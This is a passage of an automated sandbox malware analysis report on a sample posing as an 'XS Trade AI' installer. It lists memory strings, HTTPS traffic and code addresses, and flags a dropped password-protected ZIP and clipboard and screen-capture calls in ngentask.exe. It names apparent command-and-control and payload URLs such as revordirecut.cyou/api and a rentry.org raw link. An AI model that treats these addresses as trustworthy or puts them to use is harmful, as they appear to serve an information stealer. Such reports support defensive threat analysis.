      Source: taskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
      Source: taskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
      Source: XS_Trade_AI-newest_release_.tmpString found in binary or memory: https://rentry.org/55d46ea0c6e974cfc3e
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/raw
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rentry.org/55d46ea0c6e974cfc3eXy
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revordirecut.cyou/
      Source: ngentask.exe, 00000015.00000002.2191909047.0000000000C6B000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000015.00000002.2191328836.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000015.00000002.2192127076.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revordirecut.cyou/api
      Source: ngentask.exe, 00000015.00000002.2192127076.0000000000C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revordirecut.cyou/api9
      Source: ngentask.exe, 00000015.00000002.2191328836.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revordirecut.cyou/apiFX
      Source: ngentask.exe, 00000015.00000002.2191950905.0000000000C71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revordirecut.cyou:443/api
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000002.1922270385.0000000000978000.00000004.00000020.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.0000000000A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tinyurl.com/
      Source: XS_Trade_AI-newest_release_.tmp, 00000003.00000002.1922270385.0000000000978000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tinyurl.com/ec75f7fn
      Source: taskshosts.exe, 0000000F.00000003.1930484228.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928187140.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1930060595.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927313732.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928457624.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929338227.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1931095614.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928056108.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1929016414.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932655139.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1927458115.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1932942812.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928565694.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 0000000F.00000003.1928345378.00000000009AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.0000000003643000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000002.1842719957.000000000018F000.00000004.00000010.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exeString found in binary or memory: https://www.globalsign.com/repository/0
      Source: taskshosts.exe, 00000010.00000002.1978563416.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956237011.000000000320E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956572480.000000000324D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956307683.0000000000CE8000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041338255.0000000003291000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2065594673.0000000003380000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041550731.00000000032D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mandiant.com/resources/blog/tracking-malware-import-hashing
      Source: taskshosts.exe, 00000010.00000003.1956237011.000000000320E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1956572480.000000000324D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1978000920.00000000030B0000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041338255.0000000003291000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2041550731.00000000032D8000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064702449.0000000002BC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ntcore.com/files/richsign.htm
      Source: taskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018519903.000000000124F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
      Source: taskshosts.exe, 0000000F.00000003.1933674558.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977960530.0000000003070000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2026766272.000000000124F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064641634.0000000002B80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
      Source: taskshosts.exe, 00000010.00000003.1945392433.0000000000C7E000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977713653.0000000002990000.00000004.00001000.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945195148.0000000000C45000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2030520486.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000002.2064373901.0000000002A40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 135.181.116.240:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.83.166:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_00435210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00435210 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,21_2_00435210
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004359B7 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,21_2_004359B7

      System Summary

      barindex
      Drops password protected ZIP file
      Source: DontSleep_x64.zip.3.drZip Entry: encrypted
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00278752: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,6_2_00278752
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002DCD3B6_2_002DCD3B
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002D6D566_2_002D6D56
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002EADF06_2_002EADF0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F40206_2_002F4020
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003020406_2_00302040
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F20F06_2_002F20F0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003081106_2_00308110
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0028A11A6_2_0028A11A
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003041706_2_00304170
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003061506_2_00306150
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F42706_2_002F4270
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002E02BA6_2_002E02BA
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003002C06_2_003002C0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002C237F6_2_002C237F
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0030A3E06_2_0030A3E0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0030C4106_2_0030C410
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0028C4176_2_0028C417
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002FA4A06_2_002FA4A0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002EC5306_2_002EC530
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002CC50E6_2_002CC50E
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002EA5906_2_002EA590
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0028C5E66_2_0028C5E6
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002E86306_2_002E8630
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F46606_2_002F4660
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002FA7506_2_002FA750
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F88306_2_002F8830
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002EE8606_2_002EE860
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002FA8B06_2_002FA8B0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F89306_2_002F8930
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003149106_2_00314910
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003129006_2_00312900
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0028E9916_2_0028E991
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00318A206_2_00318A20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00312AB06_2_00312AB0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00314AE96_2_00314AE9
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002D2B006_2_002D2B00
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00310B906_2_00310B90
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00318BE06_2_00318BE0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002B8C036_2_002B8C03
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002BECF66_2_002BECF6
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002FAE206_2_002FAE20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0030AF206_2_0030AF20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00310FB06_2_00310FB0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003130206_2_00313020
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002ED0106_2_002ED010
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003030E86_2_003030E8
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002EF0D06_2_002EF0D0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002CB2726_2_002CB272
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F13106_2_002F1310
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002E93706_2_002E9370
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0030B4906_2_0030B490
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002715986_2_00271598
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0030F6406_2_0030F640
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F96906_2_002F9690
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002C57756_2_002C5775
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_003178C06_2_003178C0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F1A206_2_002F1A20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00303A206_2_00303A20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00271A676_2_00271A67
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002B9A5D6_2_002B9A5D
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00275A886_2_00275A88
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00307AE06_2_00307AE0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002F7B306_2_002F7B30
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00279C006_2_00279C00
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002FFCA96_2_002FFCA9
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00311CF06_2_00311CF0
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00303D406_2_00303D40
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00309E206_2_00309E20
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_002C9E896_2_002C9E89
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00313F706_2_00313F70
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_0029FF7C6_2_0029FF7C
      Source: C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exeCode function: 6_2_00301FC06_2_00301FC0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0068D1B315_2_0068D1B3
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00688A4015_2_00688A40
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006892A015_2_006892A0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069BBE815_2_0069BBE8
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0068D3E515_2_0068D3E5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_00686C0015_2_00686C00
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069FD6C15_2_0069FD6C
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006876B415_2_006876B4
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069FE8C15_2_0069FE8C
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_006A169D15_2_006A169D
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 15_2_0069B75015_2_0069B750
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0068D1B316_2_0068D1B3
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_00688A4016_2_00688A40
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006892A016_2_006892A0
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069BBE816_2_0069BBE8
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0068D3E516_2_0068D3E5
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_00686C0016_2_00686C00
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069FD6C16_2_0069FD6C
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006876B416_2_006876B4
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069FE8C16_2_0069FE8C
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_006A169D16_2_006A169D
      Source: C:\Users\user\AppData\Local\Programs\Common\taskshosts.exeCode function: 16_2_0069B75016_2_0069B750
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004100C521_2_004100C5
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042509D21_2_0042509D
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041011821_2_00410118
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041013021_2_00410130
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043A2E021_2_0043A2E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0041D5AF21_2_0041D5AF
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0044462021_2_00444620
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042A6D021_2_0042A6D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042680021_2_00426800
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040F97021_2_0040F970
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0043A97E21_2_0043A97E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0042EB6021_2_0042EB60
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040100021_2_00401000
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004431D021_2_004431D0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004331DE21_2_004331DE
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004291E021_2_004291E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_004241E021_2_004241E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_00442EB021_2_00442EB0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeCode function: 21_2_0040F25021_2_0040F250
